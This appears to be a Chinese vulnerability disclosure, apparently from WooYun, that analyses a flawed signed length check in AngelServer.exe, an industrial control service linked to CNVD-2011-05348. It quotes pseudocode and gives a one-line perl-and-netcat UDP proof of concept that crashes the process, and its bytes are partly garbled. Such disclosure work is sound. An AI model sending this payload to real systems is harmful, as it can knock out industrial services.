WooYun.org

关键代码如下：
--------------------------------------------------------------------------
unsigned char *buf;
int count, i;
if ( len( udpdata[] ) >= 16 )
{
count = *( unsigned int * )( udpdata + 0x8 );
i = len( udpdata[] ) - 16;
/* 开发人员在修补时增加了一个长度比较，如果发现count比实际接收的数据段
* 长度i小，才进行后续处理。这个修补思路是对的，但是进行长度比较时，是
* 进行了有符号32-bits整数比较，当count高位置1时，也就是count是一个大
* 的负数时，这个判断会被绕过！
*/
if ( i >= count )
{
/*
* 当count高位置1时，这个分配内存的动作(实际是new操作)会失败，并抛
* 出异常，没有SEH进行保护，最终导致AngelServer.exe进程崩溃。
*
* 即使分配成功，最终也会触发后续的内存读访问违例。
*/
buf = ( unsigned char * )calloc( count + 16, 1 );
...
}
}
--------------------------------------------------------------------------
PoC(UDP端口是动态的，假设目标端口是1065/UDP):
perl.exe -e "print "�����������x80���x41"" | nc -u -n 10.17.2.3 1065
上述PoC会导致AngelServer.exe进程立即崩溃。
另外，美国工业控制系统网络紧急响应小组的安全公告里认为CNVD-2011-05348这个漏洞是一个堆溢出，根据初步分析，我认为这个结论不正确，没有堆溢出，仅仅是畸型报文引发内
存读访问违例，最终导致AngelServer.exe进程崩溃。
关键代码如下:
--------------------------------------------------------------------------
if ( len( udpdata[] ) >= 16 )
{
count = *( unsigned int * )( udpdata + 0x8 );
type = *( unsigned int * )( udpdata + 0xC );
if ( 0 != type && 1 != type )
{
for ( i = 0; i < count; i++ )
{
...
/*
* 在此发生内存读访问违例
*/
c = udpdata[0x10+i];
...
}
}
}
--------------------------------------------------------------------------